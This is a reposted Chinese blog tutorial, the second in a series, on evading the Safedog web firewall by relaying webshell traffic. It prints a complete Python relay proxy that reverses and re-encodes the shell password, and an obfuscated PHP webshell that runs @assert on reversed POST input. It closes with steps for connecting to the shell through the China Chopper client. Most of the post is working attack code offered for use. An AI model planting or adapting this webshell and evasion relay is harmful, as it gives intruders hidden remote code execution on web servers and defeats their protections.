首页 安全文摘 WEB安全 正文

中转Webshell 绕过安全狗(二)

前言在实践中转webshell绕过安全狗(一)中,在服务端和客户端均为php。某大佬提示并分享资源后,打算使用python完成中转。部分代码无耻copy。客户端本地127.0.0.1,安装python2phpshellproxy.py#coding=utf-8 import sys reload(sys) sys.setdefaultencodin

前言

在实践中转WebShell绕过安全狗(一)中,在服务端和客户端均为php。某大佬提示并分享资源后,打算使用python完成中转。部分代码无耻copy。

客户端

本地127.0.0.1,安装python2
phpshellproxy.py

#coding=utf-8    import sys  reload(sys)  sys.setdefaultencoding('utf-8')    import web    urls = (      '/','index',      '/reverse','reverse',      )    #render = web.template.render('templates/')  import json  import urllib    class index:      def GET(self):          return 1  class Base:      def getpostdata(self, postdata):          #content with &          postdatalist = postdata.split('&')          for pa in postdatalist:              #content with =, can't split with =              index = pa.find("=")              setattr(self,pa[:index],urllib.unquote_plus(pa[index+1:]))  import requests  import codecs, urllib , base64 #, chardet  class reverse(Base, object):      def GET(self,corpid):          return 1      def POST(self):          data = web.data()          #print data          pwdata = data.split('&')[0].split('=')[1]          #print pwdata          #print 'pwdata', pwdata          #print 'pwdata[::-1]', urllib.unquote(urllib.unquote(pwdata.replace('+',' '))[::-1]).replace('&','%26').replace('+','%2b')          newpostdata = data.replace(pwdata, urllib.unquote(urllib.unquote(pwdata.replace('+',' '))[::-1]).replace('&','%26').replace('+','%2b'))          #print 'newpostdata', newpostdata          r = requests.post("http://192.168.253.129/waf/transServ.php", data=""+newpostdata.replace(' ','+'), headers = {"User-Agent":"Mozilla/5.0 (windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"})#, proxies={'http':"http://127.0.0.1:8080"})          #print r.apparent_encoding          #r.encoding = 'gb2312'          #print chardet.detect(r.content)          #print r.text          #return r.text          return r.content   if __name__ == "__main__":      app = web.application(urls, globals())      app.run()

运行需要安装

pip install web  pip install requests

服务端

shell端192.168.253.129,安装安全
reverse.php
做了点混淆,可过安全狗

<?php   $DS = $_POST['x'];  $str = strrev($DS);  $a1 = array("1234","123456");  $a2 = array($str,"5461");  $ma = array_map(null,$a1,$a2)[0][1];  @assert($ma);

使用方法

  1. 替换phpshellproxy.py中的shell地址,需配合reverse.php使用

  2. 运行python phpshellproxy.py 9000 (端口自定义)

  3. 使用菜单连接对应shell地址,如 http://[ip]:9000/reverse ,输入对应密码,配置对应脚本类型,如果打开错误,建议清掉缓存,重新打开。

操作

本地运行phpshellproxy.py文件

中转Webshell 绕过安全狗(二) 绕过 安全狗 WEBSHELL WEB安全  第1张

中国菜刀进行连接http://127.0.0.1:9000/reverse  密码:x

中转Webshell 绕过安全狗(二) 绕过 安全狗 WEBSHELL WEB安全  第2张

中转Webshell 绕过安全狗(二) 绕过 安全狗 WEBSHELL WEB安全  第3张

文由微信公众号洛米唯熊


海报

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1400.html

相关推荐

中转Webshell 绕过安全狗(一)

中转Webshell 绕过安全狗(一)

前言听说中国菜刀里有后门。抓包我是没有监测到异常数据包。为了以防万一,且更好使用中国菜刀硬杠安全狗。笔者收集了一下资料。无耻的copy大...

WEB安全 2019-06-22 0 499187

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持